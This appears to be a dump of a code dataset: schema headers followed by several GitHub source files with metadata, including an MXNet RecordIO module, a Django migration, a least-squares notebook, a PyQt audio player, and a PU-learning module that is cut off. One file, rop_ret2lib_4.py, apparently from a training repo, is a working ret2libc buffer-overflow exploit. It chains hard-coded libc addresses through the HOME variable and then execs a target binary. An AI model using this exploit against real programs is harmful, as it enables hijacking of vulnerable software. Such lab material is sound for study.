blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5baa937a803d1bfa2ca8c947fddf74cbd2b9d73b
|
3a218403531ef396e32daccf7f8e7812c9f7e8d2
|
/python/mxnet/seg_recordio.py
|
b2a2beb6c7930fea97fd62c2d0857e160dca47e4
|
[
"BSD-3-Clause",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
coderzbx/seg-mxnet
|
ac0f9cf450d0b4bebb26110921c83831ca832615
|
a3ef65a1991d59c23b6111048fdc16d38e2862af
|
refs/heads/master
| 2022-11-30T04:09:49.476375 | 2018-05-16T12:50:29 | 2018-05-16T12:50:29 | 127,411,826 | 0 | 1 |
Apache-2.0
| 2022-11-25T01:35:29 | 2018-03-30T09:51:04 |
C++
|
UTF-8
|
Python
| false | false | 15,191 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Read and write for the RecordIO data format."""
from __future__ import absolute_import
from collections import namedtuple
import ctypes
import struct
import numbers
import numpy as np
from .base import _LIB
from .base import RecordIOHandle
from .base import check_call
from .base import c_str
try:
import cv2
except ImportError:
cv2 = None
class MXSegRecordIO(object):
    """Reads/writes `RecordIO` data format, supporting sequential read and write.

    Thin ctypes wrapper over the native MXRecordIOReader/Writer API exposed
    by ``_LIB``; a single instance is either read-only or write-only,
    selected by ``flag``.

    Example usage:
    ----------
    >>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
    <mxnet.recordio.MXSegRecordIO object at 0x10ef40ed0>
    >>> for i in range(5):
    ...    record.write('record_%d'%i)
    >>> record.close()
    >>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
    >>> for i in range(5):
    ...    item = record.read()
    ...    print(item)
    record_0
    record_1
    record_2
    record_3
    record_4
    >>> record.close()

    Parameters
    ----------
    uri : string
        Path to the record file.
    flag : string
        'w' for write or 'r' for read.
    """
    def __init__(self, uri, flag):
        # Native layer expects a C string; keep it for the lifetime of the
        # handle so it is not garbage collected while the reader is open.
        self.uri = c_str(uri)
        self.handle = RecordIOHandle()  # opaque handle filled in by open()
        self.flag = flag
        self.is_open = False
        self.open()
    def open(self):
        """Opens the record file.

        Creates the native reader or writer depending on ``self.flag`` and
        sets ``self.writable`` accordingly.

        Raises
        ------
        ValueError
            If ``flag`` is neither 'w' nor 'r'.
        """
        if self.flag == "w":
            check_call(_LIB.MXRecordIOWriterCreate(self.uri, ctypes.byref(self.handle)))
            self.writable = True
        elif self.flag == "r":
            check_call(_LIB.MXRecordIOReaderCreate(self.uri, ctypes.byref(self.handle)))
            self.writable = False
        else:
            raise ValueError("Invalid flag %s"%self.flag)
        self.is_open = True
    def __del__(self):
        # Best-effort cleanup on garbage collection; close() is a no-op when
        # the file is already closed.
        self.close()
    def close(self):
        """Closes the record file and frees the native handle. Idempotent."""
        if not self.is_open:
            return
        if self.writable:
            check_call(_LIB.MXRecordIOWriterFree(self.handle))
        else:
            check_call(_LIB.MXRecordIOReaderFree(self.handle))
        self.is_open = False
    def reset(self):
        """Resets the pointer to first item.

        If the record is opened with 'w', this function will truncate the file
        to empty (implemented as a close followed by a re-open).

        Example usage:
        ----------
        >>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
        >>> for i in range(2):
        ...    item = record.read()
        ...    print(item)
        record_0
        record_1
        >>> record.reset()  # Pointer is reset.
        >>> print(record.read()) # Started reading from start again.
        record_0
        >>> record.close()
        """
        self.close()
        self.open()
    def write(self, buf):
        """Inserts a string buffer as a record.

        Example usage:
        ----------
        >>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
        >>> for i in range(5):
        ...    record.write('record_%d'%i)
        >>> record.close()

        Parameters
        ----------
        buf : string (python2), bytes (python3)
            Buffer to write.
        """
        assert self.writable
        check_call(_LIB.MXRecordIOWriterWriteRecord(self.handle,
                                                    ctypes.c_char_p(buf),
                                                    ctypes.c_size_t(len(buf))))
    def read(self):
        """Returns record as a string.

        Example usage:
        ----------
        >>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
        >>> for i in range(5):
        ...    item = record.read()
        ...    print(item)
        record_0
        record_1
        record_2
        record_3
        record_4
        >>> record.close()

        Returns
        ----------
        buf : string
            Buffer read, or ``None`` at end of file.
        """
        assert not self.writable
        buf = ctypes.c_char_p()
        size = ctypes.c_size_t()
        check_call(_LIB.MXRecordIOReaderReadRecord(self.handle,
                                                   ctypes.byref(buf),
                                                   ctypes.byref(size)))
        if buf:
            # Copy the native buffer into a Python bytes object; the pointer
            # is only valid until the next native call.
            buf = ctypes.cast(buf, ctypes.POINTER(ctypes.c_char*size.value))
            return buf.contents.raw
        else:
            return None
class MXIndexedSegRecordIO(MXSegRecordIO):
    """Reads/writes `RecordIO` data format, supporting random access.

    Keeps a side index file (tab-separated ``key\\tposition`` lines) mapping
    record keys to byte offsets in the record file.

    Example usage:
    ----------
    >>> for i in range(5):
    ...     record.write_idx(i, 'record_%d'%i)
    >>> record.close()
    >>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
    >>> record.read_idx(3)
    record_3

    Parameters
    ----------
    idx_path : str
        Path to the index file.
    uri : str
        Path to the record file. Only supports seekable file types.
    flag : str
        'w' for write or 'r' for read.
    key_type : type
        Data type for keys.
    """
    def __init__(self, idx_path, uri, flag, key_type=int):
        self.idx_path = idx_path
        self.idx = {}    # key -> byte offset in the record file
        self.keys = []   # insertion/read order of keys
        self.key_type = key_type
        self.fidx = None  # index file object, opened in open()
        super(MXIndexedSegRecordIO, self).__init__(uri, flag)
    def open(self):
        """Opens the record file and the index file; in read mode the whole
        index is loaded into memory."""
        super(MXIndexedSegRecordIO, self).open()
        self.idx = {}
        self.keys = []
        self.fidx = open(self.idx_path, self.flag)
        if not self.writable:
            # Each index line is "<key>\t<offset>".
            for line in iter(self.fidx.readline, ''):
                line = line.strip().split('\t')
                key = self.key_type(line[0])
                self.idx[key] = int(line[1])
                self.keys.append(key)
    def close(self):
        """Closes the record file and the index file. Idempotent."""
        if not self.is_open:
            return
        super(MXIndexedSegRecordIO, self).close()
        self.fidx.close()
    def seek(self, idx):
        """Sets the current read pointer position.

        This function is internally called by `read_idx(idx)` to find the current
        reader pointer position. It doesn't return anything."""
        assert not self.writable
        pos = ctypes.c_size_t(self.idx[idx])
        check_call(_LIB.MXRecordIOReaderSeek(self.handle, pos))
    def tell(self):
        """Returns the current position of write head.

        Example usage:
        ----------
        >>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
        >>> print(record.tell())
        0
        >>> for i in range(5):
        ...     record.write_idx(i, 'record_%d'%i)
        ...     print(record.tell())
        16
        32
        48
        64
        80
        """
        assert self.writable
        pos = ctypes.c_size_t()
        check_call(_LIB.MXRecordIOWriterTell(self.handle, ctypes.byref(pos)))
        return pos.value
    def read_idx(self, idx):
        """Returns the record at given index.

        Example usage:
        ----------
        >>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
        >>> for i in range(5):
        ...     record.write_idx(i, 'record_%d'%i)
        >>> record.close()
        >>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
        >>> record.read_idx(3)
        record_3
        """
        self.seek(idx)
        return self.read()
    def write_idx(self, idx, buf):
        """Inserts input record at given index and appends the (key, offset)
        pair to the index file.

        Example usage:
        ----------
        >>> for i in range(5):
        ...     record.write_idx(i, 'record_%d'%i)
        >>> record.close()

        Parameters
        ----------
        idx : int
            Index of a file.
        buf :
            Record to write.
        """
        key = self.key_type(idx)
        # Record the offset *before* writing so it points at this record.
        pos = self.tell()
        self.write(buf)
        self.fidx.write('%s\t%d\n'%(str(key), pos))
        self.idx[key] = pos
        self.keys.append(key)
ISegRHeader = namedtuple('HEADER', ['flag', 'label', 'image_size', 'label_size', 'id', 'id2'])
"""An alias for HEADER. Used to store metadata (e.g. labels) accompanying a record.
See mxnet.recordio.pack and mxnet.recordio.pack_img for example uses.
Parameters
----------
flag : int
Available for convenience, can be set arbitrarily.
label : float or an array of float
Typically used to store label(s) for a record.
image_size: int
length of image string.
label_size: int
length of label string.
id: int
Usually a unique id representing record.
id2: int
Higher order bits of the unique id, should be set to 0 (in most cases).
"""
_ISEGR_FORMAT = 'IfIIQQ'
_IR_SIZE = struct.calcsize(_ISEGR_FORMAT)
def pack(header, image_data, label_data):
    """Pack an image/label pair into an MXImageRecord byte string.

    The result is the binary header (``_ISEGR_FORMAT``) immediately followed
    by the raw image bytes and then the raw label bytes. ``header.image_size``
    and ``header.label_size`` are trusted as-is; callers should set them to
    ``len(image_data)`` and ``len(label_data)``.

    Parameters
    ----------
    header : ISegRHeader
        Header of the image record (any 6-sequence is accepted and coerced).
    image_data : bytes
        Raw encoded image string to be packed.
    label_data : bytes
        Raw encoded label string to be packed.

    Returns
    -------
    s : bytes
        The packed string.

    Examples
    --------
    >>> id = 2574
    >>> img = cv2.imread(fullpath, cv2.IMREAD_COLOR)
    >>> ret, buf = cv2.imencode(".jpg", img)
    >>> assert ret, 'failed to encode image'
    >>> image_data = buf.tostring()
    >>> label = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
    >>> ret, buf = cv2.imencode(".png", label)
    >>> assert ret, 'failed to encode label'
    >>> label_data = buf.tostring()
    >>> header = mx.seg_recordio.ISegRHeader(0, 0, len(image_data), len(label_data), id, 0)
    >>> packed_s = mx.seg_recordio.pack(header, image_data, label_data)
    """
    # Coerce any 6-sequence into the namedtuple so attribute access works.
    header = ISegRHeader(*header)
    return struct.pack(_ISEGR_FORMAT, *header) + image_data + label_data
def unpack(s):
    """Split an MXImageRecord byte string into its header and payload.

    Parameters
    ----------
    s : bytes
        String buffer from ``MXRecordIO.read``.

    Returns
    -------
    header : ISegRHeader
        Header of the image record.
    s : bytes
        The remaining payload (image bytes followed by label bytes), with any
        extra float labels (``header.flag`` of them, 4 bytes each) stripped.

    Examples
    --------
    >>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
    >>> item = record.read()
    >>> header, s = mx.seg_recordio.unpack(item)
    >>> header
    HEADER(flag=0, label=0, image_len=368032, label_len=38742, id=20129312, id2=0)
    """
    header = ISegRHeader._make(struct.unpack_from(_ISEGR_FORMAT, s))
    payload = s[_IR_SIZE:]
    if header.flag > 0:
        # A positive flag counts extra float32 labels stored ahead of the data.
        payload = payload[header.flag * 4:]
    return header, payload
def unpack_img(s, iscolor=-1):
    """Decode an MXImageSegRecord into a header, image and label array.

    Parameters
    ----------
    s : bytes
        String buffer from ``MXSegRecordIO.read``.
    iscolor : int
        Image format option for ``cv2.imdecode``.
        NOTE(review): currently unused — the image is always decoded as
        IMREAD_COLOR and the label as IMREAD_GRAYSCALE.

    Returns
    -------
    header : ISegRHeader
        Header of the image record.
    img : numpy.ndarray
        Unpacked image (BGR).
    label : numpy.ndarray
        Unpacked grayscale label.

    Examples
    --------
    >>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
    >>> item = record.read()
    >>> header, img, label = mx.seg_recordio.unpack_img(item)
    >>> header
    HEADER(flag=0, label=0, id=20129312, id2=0)
    >>> img
    array([[[ 23,  27,  45],
            [ 28,  32,  50],
            ...,
            [ 36,  40,  59],
            [ 35,  39,  58]],
           ...,
           [[ 91,  92, 113],
            [ 97,  98, 119],
            ...,
            [168, 169, 167],
            [166, 167, 165]]], dtype=uint8)
    """
    assert cv2 is not None
    header, payload = unpack(s)
    # The payload is image bytes followed by label bytes; header sizes tell
    # us where one ends and the other begins.
    img_bytes = np.frombuffer(payload, dtype=np.uint8, count=header.image_size)
    lbl_bytes = np.frombuffer(payload, dtype=np.uint8,
                              count=header.label_size, offset=header.image_size)
    decoded_img = cv2.imdecode(img_bytes, cv2.IMREAD_COLOR)
    decoded_lbl = cv2.imdecode(lbl_bytes, cv2.IMREAD_GRAYSCALE)
    return header, decoded_img, decoded_lbl
def pack_img(header, img, label, quality=95, img_fmt='.jpg', label_fmt='.png'):
    """Encode and pack an image/label pair into ``MXImageRecord``.

    Parameters
    ----------
    header : IRHeader
        Header of the image record; its ``image_size``/``label_size`` fields
        are recomputed from the encoded data, and ``id2`` is forced to 0.
    img : numpy.ndarray
        Image to be packed.
    label : numpy.ndarray
        Label to be packed.
    quality : int
        Quality for JPEG encoding in range 1-100, or compression for PNG
        encoding in range 1-9.
    img_fmt : str
        Encoding of the image (.jpg for JPEG, .png for PNG).
    label_fmt : str
        Encoding of the label (.jpg for JPEG, .png for PNG).

    Returns
    -------
    s : bytes
        The packed string.

    Examples
    --------
    >>> id = 2574
    >>> image = cv2.imread('test.jpg', cv2.IMREAD_COLOR)
    >>> label = cv2.imread('test.png', cv2.IMREAD_GRAYSCALE)
    >>> header = mx.seg_recordio.ISegRHeader(0, 0, 0, 0, id, 0)
    >>> packed_s = mx.seg_recordio.pack_img(header, image, label)
    """
    assert cv2 is not None
    jpg_formats = ['.JPG', '.JPEG']
    png_formats = ['.PNG']

    def _encode(arr, fmt):
        # Choose encoder parameters per format. BUGFIX: the original reused
        # the *image* parameters for the label when label_fmt matched neither
        # list, and started from None (which cv2.imencode rejects); an empty
        # list is the safe "no parameters" default.
        if fmt.upper() in jpg_formats:
            params = [cv2.IMWRITE_JPEG_QUALITY, quality]
        elif fmt.upper() in png_formats:
            params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
        else:
            params = []
        return cv2.imencode(fmt, arr, params)

    ret, buf = _encode(img, img_fmt)
    assert ret, 'failed to encode image'
    image_data = buf.tostring()

    ret, buf = _encode(label, label_fmt)
    # BUGFIX: message previously said "image" for a label-encoding failure.
    assert ret, 'failed to encode label'
    label_data = buf.tostring()

    # Rebuild the header with the actual encoded sizes.
    header = ISegRHeader(header.flag, header.label,
                         len(image_data), len(label_data), header.id, 0)
    return pack(header, image_data, label_data)
|
[
"[email protected]"
] | |
798e600ffd6cebdf2aa06b2b71741f788ad7e5d9
|
b198f2276f3f26bed9aaae347429875e573a0355
|
/Interview_Coding_Questions/extract_ip.py
|
5f8f784aaec2f3b0fcda2ea23d0eec658ea14071
|
[] |
no_license
|
PKStuff/task
|
c4dedd8d3cd3e34ac203839592e645d112a20ff2
|
36e0ad50aabc398135b98224eb7cca05867aa3eb
|
refs/heads/master
| 2021-06-13T22:22:56.332364 | 2021-02-09T11:57:46 | 2021-02-09T11:57:46 | 136,037,052 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 305 |
py
|
"""
This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1
"""
def extractIP(s1):
    """Print every whitespace-separated token of ``s1`` that is a valid
    dotted-quad IPv4 address.

    A token qualifies only if it has exactly four numeric parts and each
    octet is in 0-255. (The original implementation only counted dots, so it
    would also have printed invalid quads such as ``300.1.2.3``.)

    Parameters
    ----------
    s1 : str
        Free-form text possibly containing IP addresses.
    """
    for token in s1.split():
        octets = token.split('.')
        # isdigit() rejects signs/empty parts; int() bound checks the octet.
        if len(octets) == 4 and all(o.isdigit() and int(o) <= 255 for o in octets):
            print(token)

s1 = "This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1"
extractIP(s1)
|
[
"[email protected]"
] | |
c3ef23d87718434c242e7c55f33d4ccb0809bb27
|
77170eede81686cc4cac018e243b04d74c146ae6
|
/rop_ret2lib_4.py
|
64b7fdb79598929c51f1333fcbd3f1d116e8460c
|
[] |
no_license
|
Ravin-Academy/rop_ret2libc
|
76e1888608af3270a847e22f019c33a2eeefe7d1
|
88692860b0d601ab11eaad1743ef45a487dbe677
|
refs/heads/main
| 2023-02-20T03:43:55.360916 | 2021-01-23T16:00:14 | 2021-01-23T16:00:14 | 332,245,113 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
#!/usr/bin/python
# ret2libc ROP exploit for the "./dav" binary: builds an overflow payload in
# the HOME environment variable, then execs the target so the overflowed
# saved return address pivots into libc.
# NOTE: all addresses below are hard-coded for one specific libc/binary
# layout (no ASLR) and will not transfer to other systems.
from struct import *
import os
# Little-endian 32-bit gadget/function addresses.
libc_binsh = pack("<I", 0xf7ef7aaa)   # address of "/bin/sh" string (unused below)
libc_printf = pack("<I", 0xf7dcb860)  # printf() in libc
libc_exit = pack("<I", 0xf7daaa60)    # exit() in libc
libc_popret = pack("<I", 0xf7e76671)  # "pop; ret" gadget to discard printf's argument
ret = pack("<I", 0x804900a)           # plain "ret" in the target binary
rop_popret = pack("<I", 0x804901e)    # alternate pop;ret gadget (unused below)
buffer = ''
buffer += "A" * 312  # padding up to the saved return address
# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret                 # printf's "return address": pops the arg, then ret
buffer += pack("<I", 0xf7ef8b41)      # argument: pointer to a string in libc
# exit()
buffer += libc_exit
buffer += ret
PROGNAME = "./dav"
# Deliver the payload via the environment; the target overflows while
# reading HOME.
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
|
[
"[email protected]"
] | |
eb76b301f837d1da1c9bc0341c4261cae372ca7f
|
9bc2f8151e15d59b0c0327be3deaa7f126814946
|
/setup.py
|
0078180a166fe2d5240476c3ffeca45415ac549b
|
[
"MIT"
] |
permissive
|
ashwin1111/sageintacct-sdk-py
|
b6f817093ff0fb0ef60b46153d19b2ba13e595ed
|
ed3a1a27580d00b589af5b9a738994d8204b1062
|
refs/heads/master
| 2022-11-14T11:44:02.750873 | 2020-07-03T09:26:34 | 2020-07-03T09:26:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 895 |
py
|
"""
Project setup file
"""
import setuptools
with open('README.md', 'r') as f:
long_description = f.read()
setuptools.setup(
name='sageintacctsdk',
version='0.1.0',
author='Ashwin T',
author_email='[email protected]',
description='Python SDK for accessing Sage Intacct APIs',
license='MIT',
long_description=long_description,
long_description_content_type='text/markdown',
keywords=['sage-intacct', 'sage', 'fyle', 'api', 'python', 'sdk'],
url='https://github.com/fylein/sageintacct-sdk-py',
packages=setuptools.find_packages(),
install_requires=['requests==2.22.0', 'xmltodict==0.12.0'],
classifiers=[
'Topic :: Internet :: WWW/HTTP',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
]
)
|
[
"[email protected]"
] | |
328bccf4b3138a2c108c76e34c1341d685b88b08
|
7e2af9fa47719462a238693c26ac9c872749c58c
|
/Environments/project1_env/lib/python3.6/linecache.py
|
5aed931c8d3afc86198b3c5b70a44b3aa147d47a
|
[] |
no_license
|
williamsonchris/Udacity
|
b0a169f6a02f5897cd810de51f7e4657ccc29b17
|
4c947484f096fff2d8a5916145d3288b461efe25
|
refs/heads/master
| 2020-03-30T08:45:44.107299 | 2018-10-02T05:14:20 | 2018-10-02T05:14:20 | 151,037,529 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 46 |
py
|
/Users/CW/anaconda3/lib/python3.6/linecache.py
|
[
"[email protected]"
] | |
169f922fde12e42c0892becb0540abb35f3580b1
|
0fdac0d61352d3759cec291cababeef4c65c59f4
|
/mp3player.py
|
985cf2c87944d304a617b3c8dbd07a46c7d4d1c1
|
[] |
no_license
|
masterx2/VKD
|
e638b1d00233c87a48c3c55753d3e01f901c123f
|
d4aedaaa05d754ddf68c586a224443968efbc6dd
|
refs/heads/master
| 2016-08-06T13:03:55.980854 | 2013-06-23T16:52:42 | 2013-06-23T16:52:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,501 |
py
|
__author__ = 'MasterX2'
from PyQt4 import QtGui, QtCore
from PyQt4.phonon import Phonon
class Window(QtGui.QPushButton):
    """A single-button Phonon audio player (Python 2 / PyQt4).

    The button doubles as the whole UI: clicking it either opens a file
    dialog and starts playback, or stops the current playback. The button
    caption tracks the player state.
    """
    def __init__(self):
        QtGui.QPushButton.__init__(self, 'Choose File')
        # Media pipeline: source object -> audio output.
        self.mediaObject = Phonon.MediaObject(self)
        self.audioOutput = Phonon.AudioOutput(Phonon.MusicCategory, self)
        Phonon.createPath(self.mediaObject, self.audioOutput)
        self.mediaObject.stateChanged.connect(self.handleStateChanged)
        self.clicked.connect(self.handleButton)
    def handleButton(self):
        """Toggle playback: stop if playing, otherwise pick a file and play."""
        if self.mediaObject.state() == Phonon.PlayingState:
            self.mediaObject.stop()
        else:
            path = QtGui.QFileDialog.getOpenFileName(self, self.text())
            if path:  # empty path means the dialog was cancelled
                self.mediaObject.setCurrentSource(Phonon.MediaSource(path))
                self.mediaObject.play()
    def handleStateChanged(self, newstate, oldstate):
        """Keep the button caption in sync with the player state."""
        if newstate == Phonon.PlayingState:
            self.setText('Stop')
        elif newstate == Phonon.StoppedState:
            self.setText('Choose File')
        elif newstate == Phonon.ErrorState:
            source = self.mediaObject.currentSource().fileName()
            print 'ERROR: could not play:', source.toLocal8Bit().data()
if __name__ == '__main__':
    # Minimal Qt application bootstrap: create the app, show the player
    # window, and hand control to the Qt event loop.
    import sys
    app = QtGui.QApplication(sys.argv)
    app.setApplicationName('Phonon')
    win = Window()
    win.resize(200, 100)
    win.show()
    sys.exit(app.exec_())
|
[
"[email protected]"
] | |
fbb0c4e5b8fe265c6360855246cde8f9766f8dcf
|
7df98e150bb9bf9c4ef3299a00e70de80ef0fdad
|
/04-estimation/01-intro-to-estimation/website/22. Least Squares Notebook/Least-Squares-Solution.py
|
a8c9cc81fb40cb6d332f32dbed702c7e4ffeaa28
|
[] |
no_license
|
AkshadK/autonomous-flight-course-notes
|
fda761a31f2e208eab241bc4823fcf4dfa86a22b
|
6dc4cdf765c3018eb90c4e806d46841669d37c9e
|
refs/heads/master
| 2023-05-02T23:51:09.677180 | 2020-05-17T13:57:42 | 2020-05-17T13:57:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,841 |
py
|
#!/usr/bin/env python
# coding: utf-8
# # Least Squares
#
# In this notebook you'll use least squares to estimate a state vector $x$, given $m$ noisy measurements derived from:
#
# $
# \tilde{y} = Hx + v
# $
#
# $v$ is sampled from gaussian $N(0, R)$, and $H$ is a matrix mapping the state space to the measurement space. We'll assume x is constant, meaning the vehicle is currently not moving.
#
# Thus you'll want to select an estimate of the state $x$, $\hat{x}$ which maximizes the likelihood of the observed measurements $\tilde{y}$:
#
# $
# p(y = \tilde{y} | x = \hat{x})
# $
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as LA
get_ipython().run_line_magic('matplotlib', 'inline')
# ### Setup
# In[3]:
# number of samples
# the larger this value the more
# accurate the x hat will be.
n_samples = 100
# size of state (number of polynomial coefficients to estimate)
n = 4
# In[4]:
def make_H(m, degree, t):
    """Build an m-row Vandermonde-style design matrix.

    Each row has the form [t**(degree-1), ..., t**1, 1], i.e. powers of the
    corresponding sample point in descending order.
    """
    H = np.zeros((m, degree))
    # Column 0 holds the highest power; the last column is the constant 1.
    for col, power in enumerate(range(degree - 1, -1, -1)):
        H[:, col] = t ** power
    return H
# In[5]:
# known constants: sample locations and the design matrix built from them
t = np.random.uniform(-5, 5, n_samples)
H = make_H(n_samples, n, t)
# state, unknown in practice (polynomial coefficients to be recovered)
x = np.random.randn(n) * 2
# ### Collecting Observations
#
# First you'll have to collect $m$ noisy observations, these will be used later to estimate $x$.
#
# **NOTE: You may have not encountered the `@` syntax. In a nutshell, `np.dot(H, x)` is equivalent to `H @ x`. If the equation contains multiple matrix multiplications, using `@` provides a much more comprehensible expression. **
# In[6]:
# TODO: collect m noisy observations, the noise distribution should be gaussian
# y = Hx + v, with v ~ N(0, I)
y_obs = H @ x + np.random.normal(0, 1, size=(n_samples))
# In[7]:
plt.plot(t, y_obs, 'bx')
plt.title("Noisy Observations")
# The observations plot produces a polynomial of order `len(x) - 1`, i.e. a 4-element state produces a 3rd order polynomial. In this case the state $x$ are the coefficients of the polynomial. By generating observation from evaluating the polynomial at several different points we can gain a good approximation of the original state.
#
# As one might imagine, recovering a good approximation of the state requires more samples as the order of the polynomial increases.
# ### Estimating $x$
#
# Given enough samples $\hat{x}$ should converge to $x$. The exact number of measurements required depends on the complexity of mapping the state space to the measurement space, $H$ and how noisy the measurements are, determined by $v$.
#
# Recall from lecture:
#
# $
# \hat{x} = (H^T H)^{-1} H^T \tilde{y}
# $
#
# $\hat{x}$ should be similar to $x$.
# In[8]:
# Normal-equations least-squares solution (pinv guards against a singular H^T H).
x_hat = LA.pinv(H.T @ H) @ H.T @ y_obs
# In[9]:
print(x_hat)
print(x)
# In[ ]:
|
[
"[email protected]"
] | |
b1b9341f9c0553978ee251653b9c3eee26549c87
|
34e10f715b0d49b024eb1210f1da0edc5cfbc6da
|
/calls/migrations/0004_auto_20200405_1653.py
|
94d94b8bf10ef53fc48cbb09d9ac6f995baf5442
|
[] |
no_license
|
learyjk/call_logger
|
83969eba59098662336061b3d470386948e27ad2
|
67dc8118fbbe4e8973433a4bf94267fe0c4af3fb
|
refs/heads/master
| 2022-11-27T12:57:36.352216 | 2020-04-12T16:14:07 | 2020-04-12T16:14:07 | 253,056,118 | 1 | 0 | null | 2022-11-22T05:50:10 | 2020-04-04T17:15:59 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
# Generated by Django 3.0.5 on 2020-04-05 16:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: re-declare Call.callee as a cascading FK
    to calls.Callee (deleting a Callee deletes its Calls)."""

    dependencies = [
        ('calls', '0003_auto_20200404_1658'),
    ]

    operations = [
        migrations.AlterField(
            model_name='call',
            name='callee',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='calls.Callee'),
        ),
    ]
|
[
"[email protected]"
] | |
a59a925a98390920d0baad245a444b9e4bd3bdd7
|
8998e4da64a41950d2f027df0290a2feae8f4cab
|
/Pumml/pumml/learners.py
|
7fccbcb32b1518b193d66dbb53b740dbd79cf9e3
|
[] |
no_license
|
bjutliulei/Positive-and-Unlabeled-Learning
|
323a825dd61995585d62472dbe9ad227527e0a65
|
c52d2024d85548a8469a17b83c94fa5ba1f4b812
|
refs/heads/main
| 2023-02-25T18:16:23.284594 | 2021-01-28T09:48:34 | 2021-01-28T09:48:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,233 |
py
|
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_fscore_support
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture, BayesianGaussianMixture
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import precision_recall_curve
from sklearn.model_selection import RepeatedKFold
from sklearn.utils import resample
from mpl_toolkits.mplot3d import Axes3D
from monty.serialization import dumpfn
import pandas as pd
import seaborn as sns
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
"""
This module provides classes for training, testing, and deploying a PU learning model for predicting material synthesizability. Utility functions for plotting aid in visualizing and analyzing results.
References:
[1] DOI: 10.1021/acsnano.8b08014
[2] DOI: 10.1145/1401890.1401920
[3] DOI: 10.1016/j.patrec.2013.06.010
"""
__author__ = "Nathan C. Frey, Jin Wang"
__copyright__ = "MIT License"
__version__ = "0.0.1"
__maintainer__ = "Nathan C. Frey"
__email__ = "[email protected]"
__status__ = "Development"
__date__ = "Aug 2017"
class PULearner():
def __init__(self):
    """A machine learning model that predicts material synthesizability.

    Positive samples are experimentally synthesized materials. Unlabeled
    samples are not-yet synthesized materials that are part of the same
    material family. Features for training data might be generated by first
    principles (density functional theory) calculations.

    Hyperparameters are initialized with sensible defaults, but any newly
    trained model should have hyperparams carefully converged.

    Attributes:
        pu_stats (dict): Outputs of cv_baggingDT.
        df_U (DataFrame): Unlabeled data.
        df_P (DataFrame): Positive data.
        synth_scores (list): Synthesizability scores (between 0 and 1) of
            unlabeled samples.
        labels (list): Likely synthesizable (1) or not (0).
        feat_importances (DataFrame): Feature importances from trained
            decision tree classifiers. Index corresponds to feature index
            in original data.
    """
    # BUGFIX: the documented attributes were never initialized, so accessing
    # any of them before cv_baggingDT raised AttributeError. Default them to
    # None so "not yet trained" is an explicit, checkable state.
    self.pu_stats = None
    self.df_U = None
    self.df_P = None
    self.synth_scores = None
    self.labels = None
    self.feat_importances = None
def cv_baggingDT(self, pu_data, splits=3, repeats=100, bags=100, filename=''):
    """
